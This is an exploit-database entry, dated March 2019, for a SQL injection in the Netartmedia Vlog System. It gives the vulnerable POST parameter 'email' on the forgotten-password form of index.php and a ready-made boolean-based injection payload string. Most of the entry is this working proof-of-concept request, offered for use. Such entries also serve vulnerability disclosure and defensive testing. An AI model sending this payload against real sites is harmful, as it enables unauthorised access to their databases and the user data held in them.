Netartmedia Vlog System - email SQL Injection

2019-03-21T00:00:00
ID EXPLOITPACK:55ECD8FDD01DF0DEE6505F788A0B4DF1
Type exploitpack
Reporter Ahmet Ümit BAYRAM
Modified 2019-03-21T00:00:00

Description

Netartmedia Vlog System - email SQL Injection

                                        
                                            # Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
# Demo Site: https://www.phpscriptdemos.com/vlogs/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/index.php
# Vulnerable Parameter: email (POST)
# Attack
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password